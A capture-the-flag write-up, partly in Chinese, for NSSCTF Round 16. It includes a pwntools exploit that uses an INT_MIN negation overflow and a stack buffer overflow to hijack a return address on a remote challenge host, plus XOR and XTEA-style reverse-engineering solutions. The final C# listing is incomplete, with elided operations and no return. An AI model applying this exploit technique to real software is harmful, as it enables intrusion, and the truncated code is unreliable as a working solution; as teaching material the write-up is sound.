nssctfr16_wp
pwn
nc_pwnre
一个异或的逻辑, 异或后是一串base64编码,提交解码后的文本就进到shell了
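# Obfuscated byte values from the nc_pwnre challenge.
a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d]

# Every value is XORed with the same single-byte key, 0x10. A fixed one-byte
# XOR is obfuscation only: the key is recoverable from the binary, and the
# result here is a printable Base64 string.
decoded = "".join(chr(i ^ 0x10) for i in a)

# The listing had lost its indentation, so the loop body was a syntax error as
# pasted. Output is unchanged: the decoded text with no trailing newline.
print(decoded, end="")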
TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ==
ret_text
__isoc99_scanf("%d", &v2);
if ( v2 < 0 && (v2 = -v2, v2 < 0) )
-2147483648(INT_MIN)取负后会发生有符号整数溢出,结果仍然是 -2147483648,所以取负前后的两个 v2 < 0 同时成立,满足这个 if 的约束,能走到下边的 read;read 那里有一个栈溢出,覆盖返回地址为 backdoor 就好了。
from pwn import *
from LibcSearcher import *
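# Solve script for the ret_text challenge (pwntools).
#
# Root cause in the target, per the write-up: negating INT_MIN (-2147483648)
# overflows and leaves the value negative, so the sign check
# `v2 < 0 && (v2 = -v2, v2 < 0)` passes, and the read() that follows accepts
# more bytes than the stack buffer holds. A fix on the target side would
# reject INT_MIN explicitly and cap the read length at the buffer size.

# context.binary re-derives arch/bits from the ELF itself, which supersedes the
# arch='amd64' default given here; the payload below is 32-bit (p32).
context(os='linux', arch='amd64', log_level='debug')
elf = context.binary = ELF('./ret_text_v0')
libc = elf.libc

# 1 = run the local binary, 0 = connect to the remote challenge instance.
is_debug = 0
if is_debug:
    p = process()
else:
    ip = "node7.anna.nssctf.cn"
    port = 28070
    p = remote(ip, port)

# gdb.attach(p)
g = lambda x: gdb.attach(x)

# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)

# recv() recvline() recvuntil()
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)

# Leak helpers from the author's template; not used by this solve.
r_leek_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leek_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

# Tubes carry bytes; the original passed str for the prompts and the first
# payload, which pwntools only accepts with a BytesWarning.
payload = b"-2147483648"
sla(b"Easy ret2text!!!Input:\n", payload)

# Padding up to the saved return address, then the address the write-up calls
# the backdoor. Presumably 0x20 bytes of buffer plus 4 bytes of saved frame
# pointer; confirm against the disassembly.
payload = b'a' * (0x20 + 0x4) + p32(0x8049328)
sla(b"OK!!!You are right.\n", payload)

p.interactive()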
re
test your Debugger
打个断点去内存里面看一下flag就好了
CompileMe!!!
一眼 xtea,尝试编译了一下发现爆内存 vs崩溃了,有一个new ZZZ()的操作跟了一下,发现爆内存的原因是调用栈 栈帧太多了,写一个class zzz,然后再写一个getval的方法,直接把val计算出来就好了。
// Challenge source as distributed: every local is named with a run of
// underscores, so the comments below identify each one by its role.
// ZZZ is referenced but not defined anywhere in this listing.
internal class Program
{
    static void Main(string[] args)
    {
        // Key: four 64-bit words. Read as ASCII, the bytes spell
        // "Welcome to NSSCTF Round#16 Basic".
        var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
        // Ciphertext: eight 64-bit words, processed below as four pairs.
        var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
        // Delta constant of the TEA cipher family (the write-up identifies this as XTEA).
        const ulong ___ = 0x9E3779B9;
        // 32-element array whose values are never read: the ForEach below ignores
        // its lambda parameter, so this only fixes the round count at 32.
        var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
        // Pair each word with its index, group consecutive indices two at a time,
        // and decrypt each pair independently.
        var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
            .GroupBy(____________ => ____________.Index / 2)
            .Select(___________ =>
            {
                // First and second word of the pair.
                ulong _________ = ___________.ElementAt(0).Value;
                ulong __________ = ___________.ElementAt(1).Value;
                // Running sum starts at delta * 32 and is stepped down once per round,
                // i.e. the rounds run in the decryption direction.
                ulong _____________ = ___ * 32;
                ____.ToList().ForEach(_____________________ =>
                {
                    // One XTEA-style round on 64-bit words; the key word is selected
                    // by bits of the running sum.
                    __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
                    _____________ -= ___;
                    _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
                });
                return new[] { _________, __________ };
            })
            .SelectMany(______________ => ______________)
            .ToArray();
        // Write the decrypted words back over the ciphertext array.
        Array.Copy(_____, __, __.Length);
        // Each decrypted word goes through ZZZ.GetVal(); the resulting bytes are
        // reversed (most-significant byte first on a little-endian machine) and
        // written to the console one ASCII character at a time.
        __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
        //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
        //Try to compile me!!!
    }
}
一些文本处理的代码
# import re
# code = """
# //NET8.0
#
#
# namespace NSSCTF
# {
# internal class Program
# {
# static void Main(string[] args)
# {
# var _ = new ulong[] { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
# var __ = new ulong[] { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
# const ulong ___ = 0x9E3779B9;
# var ____ = Enumerable.Range(0, 32).Select(______ => ___ * (32 - (uint)______)).ToArray();
#
# var _____ = __.Select((_______, ________) => new { Value = _______, Index = ________ })
# .GroupBy(____________ => ____________.Index / 2)
# .Select(___________ =>
# {
# ulong _________ = ___________.ElementAt(0).Value;
# ulong __________ = ___________.ElementAt(1).Value;
# ulong _____________ = ___ * 32;
#
# ____.ToList().ForEach(_____________________ =>
# {
# __________ -= (((_________ << 4) ^ (_________ >> 5)) + _________) ^ (_____________ + _[(_____________ >> 11) & 3]);
# _____________ -= ___;
# _________ -= (((__________ << 4) ^ (__________ >> 5)) + __________) ^ (_____________ + _[_____________ & 3]);
# });
# return new[] { _________, __________ };
# })
# .SelectMany(______________ => ______________)
# .ToArray();
#
# Array.Copy(_____, __, __.Length);
#
# __.SelectMany(_______________ => BitConverter.GetBytes(new ZZZ(_______________).GetVal()).Reverse()).ToList().ForEach(________________ => Console.Write(Encoding.ASCII.GetString(new[] { ________________ })));
# //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
# //Try to compile me!!!
# .......
# }
# }
#
# abstract class _(ulong val)
# {
# public abstract ulong GetVal();
# }
#
# class A(ulong val) : _(val)
# {
# public override ulong GetVal()
# {
# return val + 0x79013C0BD7467DC;
# }
# }
#
# class B(ulong val) : A(val)
# {
# public override ulong GetVal()
# {
# base.GetVal();
# return val - 0x78D23D50E23FC98;
# }
# }
#
# class C(ulong val) : B(val)
# {
# """
# regex = r"return\s+val\s+([+-^])\s+(0x[a-fA-F0-9]+);"
# matches = re.findall(regex, code)
#
# for i in matches:
# print(i)
#
# data = """
# + 0x79013C0BD7467DC
# - 0x78D23D50E23FC98
# ^ 0x7E83D35728928CB
# - 0x4901E49CF9D63E8
# ^ 0x664DCA766EBA177
# + 0x7532EA705E8D596
# - 0x703A7337269BDED
# ^ 0x6FD783765C32290
# - 0x5A443D7480A09F7
#
#......
# """
#
# processed_data = ""
# for line in data.strip().split('\n'):
# operator, number = line.split(' ')
# processed_line = f"value {operator}= {number};\n"
# print(" " + processed_line)
执行后得到flag
using System.Reflection.Metadata.Ecma335;
using System.Text;
namespace NSSCTF
{
internal class Program
{
    // Decrypts the embedded ciphertext with XTEA-style rounds on 64-bit words
    // (standard XTEA uses 32-bit words), passes every decrypted word through
    // ZZZ.GetVal(), and prints the resulting bytes as ASCII.
    // Key and ciphertext are both embedded in the program, so this is
    // obfuscation rather than confidentiality.
    static void Main(string[] args)
    {
        // Read as ASCII, the key bytes spell "Welcome to NSSCTF Round#16 Basic".
        ulong[] key = { 0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963 };
        ulong[] words = { 0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9 };
        const ulong Delta = 0x9E3779B9;
        const int RoundCount = 32;

        // Decrypt into a scratch array first and copy back afterwards, so the
        // input words stay untouched until every pair has been processed.
        ulong[] plainWords = new ulong[words.Length];
        for (int offset = 0; offset < words.Length; offset += 2)
        {
            ulong left = words[offset];
            ulong right = words[offset + 1];

            // Decryption direction: the sum starts at Delta * 32 and steps down.
            ulong sum = Delta * 32;
            for (int round = 0; round < RoundCount; round++)
            {
                ulong rightMix = (((left << 4) ^ (left >> 5)) + left) ^ (sum + key[(sum >> 11) & 3]);
                right -= rightMix;
                sum -= Delta;
                ulong leftMix = (((right << 4) ^ (right >> 5)) + right) ^ (sum + key[sum & 3]);
                left -= leftMix;
            }

            plainWords[offset] = left;
            plainWords[offset + 1] = right;
        }
        Array.Copy(plainWords, words, words.Length);

        // Evaluate every GetVal() before anything is written, then emit the
        // bytes of each word in reversed order, one ASCII character per byte.
        byte[] flagBytes = words
            .SelectMany(word => BitConverter.GetBytes(new ZZZ(word).GetVal()).Reverse())
            .ToArray();
        foreach (byte flagByte in flagBytes)
        {
            Console.Write(Encoding.ASCII.GetString(new[] { flagByte }));
        }
        //Output: NSSCTF{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
        //Try to compile me!!!
    }
}
// Hand-written replacement for the challenge's ZZZ class: per the write-up, the
// original sits at the bottom of a long inheritance chain whose nested
// base.GetVal() calls exhausted the stack, so the per-class operations are
// applied here one after another in a single method.
// NOTE(review): in the class excerpt quoted earlier on this page, B.GetVal()
// calls base.GetVal() and discards the result before returning `val - const`.
// Whether accumulating every step matches the real chain cannot be confirmed
// from the page; verify against the full challenge source.
class ZZZ(ulong val)
{
    // Working copy of the constructor argument, mutated step by step in GetVal().
    ulong value = val;
    public ulong GetVal()
    {
        // One statement per class in the chain, in chain order; the first two
        // constants match classes A and B in the quoted excerpt.
        value += 0x79013C0BD7467DC;
        value -= 0x78D23D50E23FC98;
        value ^= 0x7E83D35728928CB;
        value -= 0x4901E49CF9D63E8;
        value ^= 0x664DCA766EBA177;
        value += 0x7532EA705E8D596;
        value -= 0x703A7337269BDED;
        // The line below is the author's elision marker, not C#: the remaining
        // operations are omitted from the listing, and no return statement is
        // shown (presumably `return value;` follows; confirm).
        ......
    }
}
}